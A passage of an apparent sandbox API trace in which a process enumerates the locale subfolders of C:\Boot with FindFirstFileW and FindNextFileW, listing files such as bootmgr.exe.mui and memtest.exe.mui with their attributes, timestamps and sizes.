lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.334] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.335] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.335] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.335] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.335] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.335] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.335] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.335] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.336] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.336] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.336] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.336] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.336] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.336] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.336] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.337] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.337] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.337] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.337] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.337] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.337] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.337] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.338] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.338] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.338] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.338] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.338] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.338] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.338] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.339] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.339] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.339] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.339] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.339] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.339] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.340] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.340] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.340] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.340] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.340] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.340] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.340] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.340] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.340] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.341] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.341] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.341] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.341] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.341] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.341] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.341] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.341] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.341] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.341] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.342] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 